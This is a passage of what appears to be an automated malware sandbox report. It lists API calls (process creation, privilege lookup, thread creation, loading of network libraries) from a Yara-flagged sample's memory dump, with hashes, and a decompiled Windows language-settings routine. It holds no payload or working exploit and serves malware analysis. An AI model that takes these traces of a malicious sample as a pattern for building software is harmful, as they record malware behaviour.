                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000B6F88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                    • Instruction ID: 0596b3b0630162c162b44d240f69932bd1b79e79054c4077a5d6dff263f75c94
                                                                                                                                                    • Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                    • Instruction Fuzzy Hash: 4F3190B1602705ABC725DFA8D8A1FEBB7F8EB48700F10842DF61A5B242D775A545CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000B6F88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: 7d736f24499de73c4cd765037a25e23e562d4d5ac57cc8c7634e9af0f931ecf6
                                                                                                                                                    • Instruction ID: b97e72fc2bb94317cd6e403c256a181398956afdf1458985636cf530fb19870d
                                                                                                                                                    • Opcode Fuzzy Hash: 7d736f24499de73c4cd765037a25e23e562d4d5ac57cc8c7634e9af0f931ecf6
                                                                                                                                                    • Instruction Fuzzy Hash: 6921A2B1601705ABC764DF64D8A1FEBB7F8FB48700F10802DF6199B242D775A545CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000A3B93), ref: 000B84FD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction ID: 28dbb0e6efa6f1e5050a2a3f3994edce15d7540395fd5c602ee1b2b7824e1962
                                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction Fuzzy Hash: 51E01AB12002046BD714DF59CC45EE777ACEF88750F018555F90857252CA30E910CAB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000A72BA
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000A72DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                    • Instruction ID: e2a8b8212d7d7b650e4de13a7634eca5075d241c3113985adf95b5a2494c6d64
                                                                                                                                                    • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                    • Instruction Fuzzy Hash: BA01D631A8022877E721A6D49C03FFE776C9B41B50F154119FF04BA1C3E6A47A0687F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000A9B92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: d530e4503ff5972e2628ffe345a9cd9ef5bd1e220e0afd7aed32b025e86c31a8
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: 01011EB5E0020DBBDF10DAE4ED52FDDB7B89B55308F0041A5AA0897242F671EB14CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000B8594
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction ID: 0f01cd5a6e7efc6631fb985b2cd88418d3c37a155462f36f7e6df78481741945
                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction Fuzzy Hash: 0C01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97251CA30E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000ACCD0,?,?), ref: 000B704C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: 82e3e9625107436aec6a7118588dec7f84456b8be21fd61da69fac5e166c74bb
                                                                                                                                                    • Instruction ID: 8de4edac4cc6da5ed1311d292d0b2dfcb721fb53186267399e178149011b8149
                                                                                                                                                    • Opcode Fuzzy Hash: 82e3e9625107436aec6a7118588dec7f84456b8be21fd61da69fac5e166c74bb
                                                                                                                                                    • Instruction Fuzzy Hash: 40E06D333902043AE3306599AC03FE7B39C8B91B20F540026FB0DEB2C2D595F80142A8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ACFA2,000ACFA2,?,00000000,?,?), ref: 000B8660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 7662eca02077ce0f444890916972ccdef7617b8a4e8b57030e53f4f21f14e40b
                                                                                                                                                    • Instruction ID: 584cbbf0580b82d8a46a7e96bee0ddf63396d46c254adc4e6e94f31d626f39d5
                                                                                                                                                    • Opcode Fuzzy Hash: 7662eca02077ce0f444890916972ccdef7617b8a4e8b57030e53f4f21f14e40b
                                                                                                                                                    • Instruction Fuzzy Hash: 21F0E5B5200204AFDB10DF54CC40EE77B68DF46710F1084A5FA0C57342C930A905CBF1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(000B3516,?,000B3C8F,000B3C8F,?,000B3516,?,?,?,?,?,00000000,00000000,?), ref: 000B84BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction ID: 6eb590c2dfa7aa45113636d6dfe12363ee4ea06e5f6bdebdb426aba41fd35aae
                                                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC41EE777ACEF88650F118959FA085B282CA30F910CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ACFA2,000ACFA2,?,00000000,?,?), ref: 000B8660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction ID: 3a4125c7d4676d446c55e049025b15a514ca34bc82565a60a81dfd03524aca03
                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction Fuzzy Hash: F4E01AB12002086BDB10DF49CC85EE737ADEF88650F018555FA0857242C930E810CBF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000A7C63,?), ref: 000AD43B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction ID: fada8488cb76abb8c5e1cf75bcd3c23163e9bcb755e71fe6b276d095a080f9de
                                                                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A7717503043BE710FBE89C03F6632CC5B55B00F494064F949DB3C3D960F5004565
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E02508788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				short* _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _v32;
                                                                                                                                                    				char _v36;
                                                                                                                                                    				signed int _v40;
                                                                                                                                                    				char _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				signed int _v52;
                                                                                                                                                    				signed int _v56;
                                                                                                                                                    				signed int _v60;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void* _t216;
                                                                                                                                                    				intOrPtr _t231;
                                                                                                                                                    				short* _t235;
                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                    				short* _t261;
                                                                                                                                                    				intOrPtr _t284;
                                                                                                                                                    				intOrPtr _t288;
                                                                                                                                                    				void* _t314;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				short* _t319;
                                                                                                                                                    				intOrPtr _t321;
                                                                                                                                                    				void* _t328;
                                                                                                                                                    				void* _t329;
                                                                                                                                                    				char* _t332;
                                                                                                                                                    				signed int _t333;
                                                                                                                                                    				signed int* _t334;
                                                                                                                                                    				void* _t335;
                                                                                                                                                    				void* _t338;
                                                                                                                                                    				void* _t339;
                                                                                                                                                    
                                                                                                                                                    				_t328 = __edx;
                                                                                                                                                    				_t322 = __ecx;
                                                                                                                                                    				_t318 = 0;
                                                                                                                                                    				_t334 = _a4;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_v48 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v40 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v52 = 0;
                                                                                                                                                    				if(_t334 == 0) {
                                                                                                                                                    					_t329 = 0xc000000d;
                                                                                                                                                    					L49:
                                                                                                                                                    					_t334[0x11] = _v56;
                                                                                                                                                    					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                    					_t334[0x12] = _v60;
                                                                                                                                                    					_t334[0x13] = _v28;
                                                                                                                                                    					_t334[0x17] = _v20;
                                                                                                                                                    					_t334[0x16] = _v48;
                                                                                                                                                    					_t334[0x18] = _v40;
                                                                                                                                                    					_t334[0x14] = _v32;
                                                                                                                                                    					_t334[0x15] = _v52;
                                                                                                                                                    					return _t329;
                                                                                                                                                    				}
                                                                                                                                                    				_v56 = 0;
                                                                                                                                                    				if(E02508460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_v56 = 1;
                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                    						_t207 = E024EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_push(1);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E0250718A(_t207);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_v60 = _v60 | 0xffffffff;
                                                                                                                                                    				if(E02508460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                    					_t333 =  *_v8;
                                                                                                                                                    					_v60 = _t333;
                                                                                                                                                    					_t314 = E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					_push(_t333);
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					E0250718A(_t314);
                                                                                                                                                    					_t335 = _t335 + 4;
                                                                                                                                                    				}
                                                                                                                                                    				_t216 = E02508460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                    				_t332 = ";";
                                                                                                                                                    				if(_t216 < 0) {
                                                                                                                                                    					L17:
                                                                                                                                                    					if(E02508460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    						L30:
                                                                                                                                                    						if(E02508460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                    							L46:
                                                                                                                                                    							_t329 = 0;
                                                                                                                                                    							L47:
                                                                                                                                                    							if(_v8 != _t318) {
                                                                                                                                                    								E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							if(_v28 != _t318) {
                                                                                                                                                    								if(_v20 != _t318) {
                                                                                                                                                    									E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    									_v20 = _t318;
                                                                                                                                                    									_v40 = _t318;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							goto L49;
                                                                                                                                                    						}
                                                                                                                                                    						_t231 = _v24;
                                                                                                                                                    						_t322 = _t231 + 4;
                                                                                                                                                    						_push(_t231);
                                                                                                                                                    						_v52 = _t322;
                                                                                                                                                    						E0250718A(_t231);
                                                                                                                                                    						if(_t322 == _t318) {
                                                                                                                                                    							_v32 = _t318;
                                                                                                                                                    						} else {
                                                                                                                                                    							_v32 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    						}
                                                                                                                                                    						if(_v32 == _t318) {
                                                                                                                                                    							_v52 = _t318;
                                                                                                                                                    							L58:
                                                                                                                                                    							_t329 = 0xc0000017;
                                                                                                                                                    							goto L47;
                                                                                                                                                    						} else {
                                                                                                                                                    							E024E2340(_v32, _v8, _v24);
                                                                                                                                                    							_v16 = _v32;
                                                                                                                                                    							_a4 = _t318;
                                                                                                                                                    							_t235 = E024FE679(_v32, _t332);
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t319 = _t235;
                                                                                                                                                    								if(_t319 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								 *_t319 = 0;
                                                                                                                                                    								_t321 = _t319 + 2;
                                                                                                                                                    								E024EE2A8(_t322,  &_v68, _v16);
                                                                                                                                                    								if(E02505553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    								_v16 = _t321;
                                                                                                                                                    								_t235 = E024FE679(_t321, _t332);
                                                                                                                                                    								_pop(_t322);
                                                                                                                                                    							}
                                                                                                                                                    							_t236 = _v16;
                                                                                                                                                    							if( *_v16 != _t319) {
                                                                                                                                                    								E024EE2A8(_t322,  &_v68, _t236);
                                                                                                                                                    								if(E02505553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    									_a4 = _a4 + 1;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							if(_a4 == 0) {
                                                                                                                                                    								E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                    								_v52 = _v52 & 0x00000000;
                                                                                                                                                    								_v32 = _v32 & 0x00000000;
                                                                                                                                                    							}
                                                                                                                                                    							if(_v8 != 0) {
                                                                                                                                                    								E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                    							}
                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                    							_t318 = 0;
                                                                                                                                                    							goto L46;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t257 = _v24;
                                                                                                                                                    					_t322 = _t257 + 4;
                                                                                                                                                    					_push(_t257);
                                                                                                                                                    					_v40 = _t322;
                                                                                                                                                    					E0250718A(_t257);
                                                                                                                                                    					_t338 = _t335 + 4;
                                                                                                                                                    					if(_t322 == _t318) {
                                                                                                                                                    						_v20 = _t318;
                                                                                                                                                    					} else {
                                                                                                                                                    						_v20 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    					}
                                                                                                                                                    					if(_v20 == _t318) {
                                                                                                                                                    						_v40 = _t318;
                                                                                                                                                    						goto L58;
                                                                                                                                                    					} else {
                                                                                                                                                    						E024E2340(_v20, _v8, _v24);
                                                                                                                                                    						_v16 = _v20;
                                                                                                                                                    						_a4 = _t318;
                                                                                                                                                    						_t261 = E024FE679(_v20, _t332);
                                                                                                                                                    						_t335 = _t338 + 0x14;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_v12 = _t261;
                                                                                                                                                    							if(_t261 == _t318) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_v12 = _v12 + 2;
                                                                                                                                                    							 *_v12 = 0;
                                                                                                                                                    							E024EE2A8(_v12,  &_v68, _v16);
                                                                                                                                                    							if(E02505553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v12;
                                                                                                                                                    							_t261 = E024FE679(_v12, _t332);
                                                                                                                                                    							_pop(_t322);
                                                                                                                                                    						}
                                                                                                                                                    						_t269 = _v16;
                                                                                                                                                    						if( *_v16 != _t318) {
                                                                                                                                                    							E024EE2A8(_t322,  &_v68, _t269);
                                                                                                                                                    							if(E02505553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    								_a4 = _a4 + 1;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_a4 == _t318) {
                                                                                                                                                    							E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                    							_v40 = _t318;
                                                                                                                                                    							_v20 = _t318;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v8 != _t318) {
                                                                                                                                                    							E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _t318;
                                                                                                                                                    						goto L30;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				_t284 = _v24;
                                                                                                                                                    				_t322 = _t284 + 4;
                                                                                                                                                    				_push(_t284);
                                                                                                                                                    				_v48 = _t322;
                                                                                                                                                    				E0250718A(_t284);
                                                                                                                                                    				_t339 = _t335 + 4;
                                                                                                                                                    				if(_t322 == _t318) {
                                                                                                                                                    					_v28 = _t318;
                                                                                                                                                    				} else {
                                                                                                                                                    					_v28 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v28 == _t318) {
                                                                                                                                                    					_v48 = _t318;
                                                                                                                                                    					goto L58;
                                                                                                                                                    				} else {
                                                                                                                                                    					E024E2340(_v28, _v8, _v24);
                                                                                                                                                    					_v16 = _v28;
                                                                                                                                                    					_a4 = _t318;
                                                                                                                                                    					_t288 = E024FE679(_v28, _t332);
                                                                                                                                                    					_t335 = _t339 + 0x14;
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_v12 = _t288;
                                                                                                                                                    						if(_t288 == _t318) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_v12 = _v12 + 2;
                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                    						E024EE2A8(_v12,  &_v68, _v16);
                                                                                                                                                    						if(E02505553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    						_v16 = _v12;
                                                                                                                                                    						_t288 = E024FE679(_v12, _t332);
                                                                                                                                                    						_pop(_t322);
                                                                                                                                                    					}
                                                                                                                                                    					_t296 = _v16;
                                                                                                                                                    					if( *_v16 != _t318) {
                                                                                                                                                    						E024EE2A8(_t322,  &_v68, _t296);
                                                                                                                                                    						if(E02505553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                    							_a4 = _a4 + 1;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if(_a4 == _t318) {
                                                                                                                                                    						E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                    						_v48 = _t318;
                                                                                                                                                    						_v28 = _t318;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v8 != _t318) {
                                                                                                                                                    						E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = _t318;
                                                                                                                                                    					goto L17;
                                                                                                                                                    				}
                                                                                                                                                    			}

                                                                                                                                                    0x02551bf8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508b04
                                                                                                                                                    0x02508a0e
                                                                                                                                                    0x02508a11
                                                                                                                                                    0x02508a14
                                                                                                                                                    0x02508a15
                                                                                                                                                    0x02508a18
                                                                                                                                                    0x02508a22
                                                                                                                                                    0x02508b59
                                                                                                                                                    0x02508a28
                                                                                                                                                    0x02508a3c
                                                                                                                                                    0x02508a3c
